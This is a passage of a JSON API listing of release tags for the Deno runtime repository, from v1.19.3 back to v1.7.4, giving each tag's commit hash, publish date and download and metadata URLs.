purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.